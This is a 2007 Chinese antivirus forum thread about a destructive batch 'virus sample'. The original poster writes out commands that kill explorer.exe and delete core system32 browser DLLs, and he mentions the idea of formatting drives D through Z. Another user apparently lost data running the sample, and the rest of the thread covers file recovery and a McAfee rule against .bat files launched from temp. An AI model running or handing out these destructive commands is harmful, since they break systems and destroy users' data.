楼主: Saturn87930

[病毒样本] 刚刚运行的破壳蜗牛,怎么能说没用,看看这个

Saturn87930
我本来想定义一个函数映射FORMAT  D到Z盘,想想没必要
  你们是在影子下面搞
如果正常下面,不要开EQ,什么类的,完全可以搞死卡巴,我讨厌我这里用卡巴的人,天天说卡巴好什么什么的,疏不知我是学校第一个用卡巴的~!
所以,完全针对卡巴来的
在正常模式下,不开什么行为什么的
@taskkill /f /im explorer.exe
del C:\WINDOWS\system32\browselc.dll
del C:\WINDOWS\system32\browser.dll
del C:\WINDOWS\system32\browseui.dll
del C:\WINDOWS\system32\browsewm.dll
这个代码,在你们看来,会有什么结果?
反正在VM里面我试了,成功了……
只是你用有影子,出来就又有了
感觉就是只有FORMAT
tonger2003
原帖由 aoyang 于 2007-5-17 17:35 发表

我也没试过,既然这样,我早点把他从我的硬盘里喀嚓掉。

在网上重新下了个 完全功能版

恢复了

但是只恢复了一点而已

很多都没有恢复

它这个好象是根据在内存上留下的痕迹 恢复

很多都没恢复~~~
aoyang
头像被屏蔽
楼主下次应该说明一下有什么破坏,tonger2003 就是受害者,如果有准备就不会出现这样的情况了。
Saturn87930
呵呵,你用用EASYRECOVERY看看,里面有FORMAT恢复的~!
但之前同样情况
我用它恢复部分有乱码……

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
tonger2003
原帖由 Saturn87930 于 2007-5-17 17:43 发表
呵呵,你用用EASYRECOVERY看看,里面有FORMAT恢复的~!
但之前同样情况
我用它恢复部分有乱码……

用这个的

恢复了很少的一部分~~

很多都没有恢复~~~
Saturn87930
我不知道你用的哪个版本
我这个版本还好用
什么盘删了都可以恢复,包括FORMAT
U盘的也照样
到里面看时间选择什么时候删除或者format的,
选择性恢复

兄弟,说句对不起了~!原谅一下~!
fiorano
用macfee自定义“禁止从temp文件见启动bat”是不是可以避免?
e.g.:    **\temp\**\*.bat(cmd)
bridgewr
微点还是搞定鸟

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Saturn87930
原帖由 fiorano 于 2007-5-17 18:12 发表
用macfee自定义“禁止从temp文件见启动bat”是不是可以避免?
e.g.:    **\temp\**\*.bat(cmd)

问你一下,你的卖咖啡可以查到不?
allenhippo
easyrecovery中文名不支持的